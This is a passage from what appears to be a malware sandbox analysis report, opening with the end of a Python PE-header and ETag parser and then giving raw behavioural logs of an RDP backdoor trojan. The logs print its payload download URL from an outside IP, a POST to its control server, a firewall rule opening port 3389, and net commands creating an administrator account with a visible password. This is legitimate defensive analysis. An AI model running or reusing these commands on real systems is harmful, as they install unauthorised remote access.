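        raise ValueError("body is not an MZ image")
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsec, ts, _symtab, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", body, e_lfanew + 4)
    sec_off = e_lfanew + 24 + opt_size
    sections = []
    for i in range(nsec):
        name, _vs, _va, raw_size, _rp, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", body, sec_off + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "raw_size": raw_size,
                         "executable": bool(sc & 0x20000000)})   # IMAGE_SCN_MEM_EXECUTE
    return {
        "machine": machine,                                   # 0x14c = IMAGE_FILE_MACHINE_I386
        "num_sections": nsec,
        "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "is_executable_image": bool(chars & 0x0002),
        "is_dll": bool(chars & 0x2000),
        "sections": sections,
    }


def check_nginx_etag(headers: dict) -> dict:
    """nginx emits ETag "<mtime hex>-<size hex>"; confirm both halves agree
    with Last-Modified and Content-Length so a rewritten header stands out."""
    mtime_hex, size_hex = headers["ETag"].strip('"').split("-")
    mtime = datetime.fromtimestamp(int(mtime_hex, 16), tz=timezone.utc)
    return {
        "size_matches": int(size_hex, 16) == int(headers["Content-Length"]),
        "mtime_matches": mtime == parsedate_to_datetime(headers["Last-Modified"]),
    }


if __name__ == "__main__":
    summary = parse_pe_summary(build_sample_body())
    print(summary)
    print(check_nginx_etag(RESPONSE_HEADERS))
```

Run against the sample body this reports machine 0x14c, nine sections of which .text and .itext are executable, an executable image rather than a DLL, and a link time of 2017-12-27 17:19:31 UTC, which is why the sandbox raised "Downloads executable code via HTTP". The ETag check passes: 0x1b3e00 is 1785344 and 0x66f55533 is the Last-Modified time. That same hex epoch is the prefix of the file name 66f55533ca7d6_RDPWInst.exe, and a 13-character hex string of eight seconds digits plus five microsecond digits is the shape PHP's uniqid() produces, which suggests the payload was uploaded to the host through a PHP front end.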
Source: Joe Sandbox View; IP Address: 104.26.12.205
Source: Joe Sandbox View; IP Address: 147.45.44.104
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: api.ipify.org
Source: unknown; TCP traffic detected without corresponding DNS query: 147.45.44.104 (reported 50 times)
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Code function: 3_2_0043CF60 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle
Source: global traffic; DNS traffic detected: DNS query: api.ipify.org
Source: global traffic; DNS traffic detected: DNS query: yalubluseks.eu
Source: unknown; HTTP traffic detected: POST /get_rdp.php HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: yalubluseks.eu; Content-Length: 58; Expect: 100-continue; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 08 Oct 2024 01:31:01 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; X-Content-Type-Options: nosniff; CF-Cache-Status: DYNAMIC; Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2FKkLmw5gyBr4YabzhAfntmQOBN4gs9Zy3Gu%2FXTQ6JKGe%2BM33xdwjMT4URkPeSiBDFA23xNqelbUVVPlotDBaqFDOJ1kC8GQu%2Bxm0pAVDFWJY16LqLuf3LiKgWlUyj74Zg%3D%3D"}],"group":"cf-nel","max_age":604800}; NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}; Server: cloudflare; CF-RAY: 8cf25e731d8c7cfc-EWR; Body (chunked, first chunk size 0x92): <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://147.45.44.104
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe; String found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exeP
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe; String found in binary or memory: http://api.ipify.org
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000307D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://api.ipify.org/
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000307D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://api.ipify.orgd
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RDPWInst.exe, RDPWInst.exe, 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr; String found in binary or memory: http://stascorp.com/load/1-1-0-62
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000304A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.3.dr; String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: Amcache.hve.27.dr; String found in binary or memory: http://upx.sf.net
Source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr; String found in binary or memory: http://www.apache.org/licenses/
Source: RDPWInst.exe, 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://yalubluseks.eu
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://yalubluseks.eud
Source: RDPWInst.exe; String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
Source: RDPWInst.exe, 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, RDPWInst.exe.0.dr; String found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://yalubluseks.eu
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe; String found in binary or memory: https://yalubluseks.eu/get_rdp.php
Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000308E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://yalubluseks.eu/get_rdp.phpd
Source: unknown; Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49733
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; File created: C:\Windows\System32\rfxvmt.dll
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe; Code function: 3_2_0040360C
                        Source: Joe Sandbox ViewDropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00406BE0 appears 36 times
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00404CDC appears 74 times
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00407450 appears 135 times
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 004042F8 appears 74 times
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 2488
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.00000000030AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRDPCreator.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000304A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerfxvmt.dllj% vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3518682753.000000000304A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRDPWInst.exeB vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000002.3517364014.00000000011CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe, 00000000.00000000.1664658414.0000000000BA2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRDPCreator.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeBinary or memory string: OriginalFilenameRDPCreator.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                        Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                        Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@29/11@2/3
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043BF00 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,3_2_0043BF00
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0040FAE8 GetDiskFreeSpaceW,3_2_0040FAE8
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043DC64 LoadLibraryExW,FindResourceW,LoadResource,FreeLibrary,3_2_0043DC64
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 3_2_0043B1A8 OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,GetLastError,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,3_2_0043B1A8
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP WrapperJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6468
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to behavior
                        Source: Yara matchFile source: 3.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.1688644177.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeReversingLabs: Detection: 44%
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeVirustotal: Detection: 58%
                        Source: RDPWInst.exeString found in binary or memory: Link: http://stascorp.com/load/1-1-0-62
                        Source: SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeString found in binary or memory: /add
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe"
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_217d5074 DUF6g)aA2aiB /add
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /add
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_217d5074 /add
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_217d5074 /add
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 2488
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroupJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /addJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_217d5074 /addJump to behavior
                        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_217d5074 /addJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
